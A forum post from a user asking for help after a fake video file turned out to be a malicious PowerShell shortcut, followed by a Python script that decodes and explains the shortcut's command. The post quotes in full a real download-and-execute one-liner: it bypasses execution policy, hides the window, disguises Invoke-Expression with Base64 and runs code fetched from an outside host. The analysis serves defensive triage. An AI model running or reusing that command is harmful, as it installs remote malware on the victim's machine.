I downloaded what I thought was a video file and after I tried to open it twice, I realized it was actually a PowerShell shortcut with the following parameters: -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB
I immediately ran virus scans with Windows Defender, Malwarebytes and Kaspersky VRT, but they didn't catch anything. I checked Event Viewer and it has logged multiple events in PowerShell and Security within a few seconds of the shortcut being run, so I know it did something, or at least tried to do something, and I just want to be sure that my computer is safe.
I ran the shortcut at 2019-04-10 04:02 and from the FRST.txt I can see that it downloaded a file called rew.exe that is associated with Realtek Semiconductor and has the Adobe logo as its icon, so it's definitely not legit. It seems the anti-virus programs didn't catch it and it's still on my system; what should I do with it?
It also created several user permission groups and I have no idea how to get rid of them.
FRST.txt
Addition.txt
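As an added triage example (not part of the post above), here is a small Python script that unpacks the quoted shortcut command line: it decodes the Base64 literal, follows the `sal` alias back to Invoke-Expression, and lists the download URL, the execution-policy bypass and the hidden-window switch. The regex names and the `analyze` function are my own; the only input is the command line copied from the post.

```python
import base64
import re

# Sample input: the shortcut arguments quoted in the post above.
POST_CMDLINE = (
    "-Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('aWV4'));sal ext $Lti;"
    "$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB"
)

# $var = ... FromBase64String('...')   -> the variable holds the decoded text
ASSIGN_B64_RE = re.compile(r"(\$\w+)\s*=[^;]*FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)
# sal / Set-Alias <name> <$var>        -> the alias resolves to whatever $var holds
ALIAS_RE = re.compile(r"\b(?:sal|Set-Alias)\s+(\w+)\s+(\$\w+)", re.I)
# $var = ... DownloadString('url')     -> the variable holds remote content
DOWNLOAD_RE = re.compile(r"(\$\w+)\s*=[^;]*DownloadString\(\s*'([^']+)'\s*\)", re.I)

def decode_b64(text):
    """Decode a Base64 literal; malformed input yields a placeholder instead of an exception."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a subclass of ValueError
        return "<undecodable>"

def analyze(cmd):
    """Resolve the variable/alias indirection and report what the one-liner does."""
    variables = {var: decode_b64(b64) for var, b64 in ASSIGN_B64_RE.findall(cmd)}
    downloads = {var: url for var, url in DOWNLOAD_RE.findall(cmd)}
    aliases = {name: variables.get(var, var) for name, var in ALIAS_RE.findall(cmd)}
    findings = []
    if re.search(r"-ex\w*\s+bypass\b", cmd, re.I):      # -Exec / -ExecutionPolicy bypass
        findings.append("execution policy bypass")
    if re.search(r"-w\w*\s+(?:1|hidden)\b", cmd, re.I):  # -windo 1 == -WindowStyle Hidden
        findings.append("hidden window")
    for name, target in aliases.items():
        if target.strip().lower() in ("iex", "invoke-expression"):
            findings.append(f"alias '{name}' is Invoke-Expression (hidden via Base64)")
            # Is the alias applied to a variable that holds downloaded content?
            for var, url in downloads.items():
                if re.search(rf"\b{re.escape(name)}\s+{re.escape(var)}\b", cmd, re.I):
                    findings.append(f"executes content downloaded from {url}")
    return {"variables": variables, "aliases": aliases, "downloads": downloads, "findings": findings}

if __name__ == "__main__":
    for line in analyze(POST_CMDLINE)["findings"]:
        print(line)
```

The same decoding can be applied to the ScriptBlock text in the PowerShell event log entries the post mentions, which is where the downloaded second stage (the rew.exe drop) would show up.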